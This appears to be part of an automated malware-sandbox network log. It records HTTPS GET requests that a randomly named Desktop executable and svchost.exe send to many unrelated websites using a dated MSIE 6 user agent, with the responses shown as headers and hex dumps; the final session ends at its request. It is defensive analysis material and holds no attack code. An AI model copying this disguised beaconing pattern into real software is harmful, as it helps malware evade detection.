                                                                                                                                                                                                                                                                        150192.168.2.664051188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2317OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2318INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:29 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ShTCVdQWKWEi%2BRN%2BX7WWNM1PYv%2BtiTv5o%2FQkNwpQCFSstQ063Ufk5sh%2BhOecoXWwzWaCg%2FddZEOB%2B295q1tQ2F02I0H%2BeyR%2BFWHBbRYm8IGX7RluAmGeFBck"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8765eb5bbb6-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2319INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2319INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        151192.168.2.664240104.21.48.207443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2318OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2320INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:33 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:33 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VUyEmWBTr%2BXGu3nrtcclGS7EVeiONehfu8nH4VO0r18Pu4amoicEXUiUc6T5FVGfJe83BWoptTg36C7j4GJ2SuNBL8haOMaAPz8XCKif3BySDhItgvaWyTOM%2BOTQk1qm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8773b039a17-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2321INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2321INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        152192.168.2.664489138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2319OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2319INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2320INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        153192.168.2.664610188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2320OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2322INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:29 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0Aqq9vFD7uJY3HZQzx6O1bMRiVwPg9ssMy7s4JwOptFZPRjY44oK0G6mEeUMb4m4MgR7S7qtscGm98mbIzbMCn3Bp436r9kVNBBW6RQj8DoAfwKhULlEwJhO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a878bf4f92b3-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2323INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2323INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        154192.168.2.664623138.201.65.187443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2321OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2321INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2321INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        155192.168.2.664669188.114.97.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2322OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2323INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:29 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gi6ilxtKHfH8ohCyGJjM8nu8pYGwIDKo6O4sUi0fS3Lx2MgVi0IJDTYK53Z8tHv6tfFaF6zbVH4QUHNMch0SYroqnrSC7Q%2F2rY8r2Xq7447GF%2FavjUrypJEgDTZS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a8795cdcbb61-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2324INData Raw: 31 65 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ea7<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2324INData Raw: 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: ,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2325INData Raw: 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 64 74 63 6c 74 6b 7a 31 77 70 75 58 74 47 33 36 68 56 30 6a 72 5f 65 78 65 62 56 45 6a 32 6a 66 4f 63 47 59 4f 2e 67 62 32 67 45 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 78 52 4a 6b 7a 52 69 49 35 4d 42 67 67 48 72 75 64 44 51 62 33 69 44 73 4c 76 74 4b 74 52 57 36 76 43 4d 53 4a 63 4b 42 79 37 34 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 41 51
                                                                                                                                                                                                                                                                        Data Ascii: "/?__cf_chl_f_tk=dtcltkz1wpuXtG36hV0jr_exebVEj2jfOcGYO.gb2gE-1678431389-0-gaNycGzNCPs" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="xRJkzRiI5MBggHrudDQb3iDsLvtKtRW6vCMSJcKBy74-1678431389-0-AQ
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2327INData Raw: 39 63 73 4e 76 53 4c 77 4e 45 30 61 71 54 77 42 5f 36 7a 75 37 68 52 65 7a 77 30 68 4a 68 38 74 41 76 77 54 74 57 69 39 34 33 6e 65 59 4b 38 6c 58 71 7a 45 57 67 6d 5a 55 48 55 67 56 4b 30 71 5a 6c 33 78 52 65 38 66 70 37 64 4a 30 43 76 6a 5f 37 57 59 5a 42 38 55 30 4b 75 41 6e 46 34 32 76 30 72 55 75 65 34 77 33 67 6c 66 32 67 45 6c 73 35 73 70 69 57 5a 66 39 61 66 38 55 33 64 36 2d 54 52 5a 75 30 7a 50 61 4f 77 31 76 34 38 57 36 7a 54 6c 6b 63 47 4c 43 4a 6f 75 55 4e 50 6c 72 30 63 73 44 38 4c 46 66 76 59 33 6d 6a 44 4f 6a 38 53 69 6b 48 66 4c 4c 51 66 55 37 6e 39 66 4d 32 58 43 51 31 6c 6f 66 6b 54 51 46 59 6c 77 33 6f 67 6f 42 6e 37 51 6b 61 4e 76 7a 36 77 58 5a 5f 49 38 54 4c 74 57 30 47 44 30 53 4b 4a 6d 46 51 39 6b 31 56 4c 45 74 57 48 45 45 58 6a
                                                                                                                                                                                                                                                                        Data Ascii: 9csNvSLwNE0aqTwB_6zu7hRezw0hJh8tAvwTtWi943neYK8lXqzEWgmZUHUgVK0qZl3xRe8fp7dJ0Cvj_7WYZB8U0KuAnF42v0rUue4w3glf2gEls5spiWZf9af8U3d6-TRZu0zPaOw1v48W6zTlkcGLCJouUNPlr0csD8LFfvY3mjDOj8SikHfLLQfU7n9fM2XCQ1lofkTQFYlw3ogoBn7QkaNvz6wXZ_I8TLtW0GD0SKJmFQ9k1VLEtWHEEXj
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2328INData Raw: 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 62 35 33 31 63 38 38 62 66 37 38 37 64 34 32 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 64 74 63 6c 74 6b 7a 31 77 70 75 58 74 47 33 36 68 56 30 6a 72 5f 65 78 65 62 56 45 6a 32 6a 66 4f 63 47 59 4f 2e 67 62 32 67 45 2d 31 36 37 38 34 33 31 33 38 39 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 70 6c 56 3a 20 34 2c 0a 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ', cHash: 'b531c88bf787d42', cUPMDTk: "\/?__cf_chl_tk=dtcltkz1wpuXtG36hV0jr_exebVEj2jfOcGYO.gb2gE-1678431389-0-gaNycGzNCPs", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0', cTplV: 4,
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2329INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 55 50 6f 33 79 53 70 38 47 4d 45 51 37 36 31 4b 45 38 59 6e 5a 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b 44 59 49 30 4d 48 64 72 6c 6b 3d 27 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: i2: 'UPo3ySp8GMEQ761KE8YnZA==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7skDYI0MHdrlk=',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2331INData Raw: 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: po.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinfo"> <div clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2332INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        156192.168.2.66415049.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:29 UTC2343OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: nts-web.net


